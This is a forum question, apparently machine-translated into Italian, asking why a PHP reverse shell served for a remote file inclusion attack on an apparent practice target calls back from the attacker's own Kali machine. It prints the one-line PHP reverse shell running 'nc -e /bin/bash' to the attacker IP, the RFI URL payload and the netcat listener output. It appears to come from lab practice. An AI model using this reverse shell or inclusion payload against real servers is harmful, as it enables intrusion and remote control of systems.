Problema con direzione di inversione della direzione

1

Nel tentativo di sfruttare la debolezza di RFI sto eseguendo Apache sulla mia casella Kali per ospitare la shell inversa di php e la shell era backconnect per me (la mia macchina kali).

Perché ricevo una shell dalla mia macchina Kali invece che dal server web di destinazione?

La shell inversa php: shell.php

<?php echo shell_exec('nc -e /bin/bash <Kali IP> 4444'); ?>

Lo sfruttamento di RFI:

http://<Target IP>/vulnerabilities/fi/?page=http://<Kali IP>/shell.php

Quando corro:

nc -nlvp 4444
connect to [192.168.60.2] from (UNKNOWN) [192.168.60.2] 46654
hostname 
kali
    
posta OmZ 30.01.2018 - 15:08
fonte

0 risposte

Leggi altre domande sui tag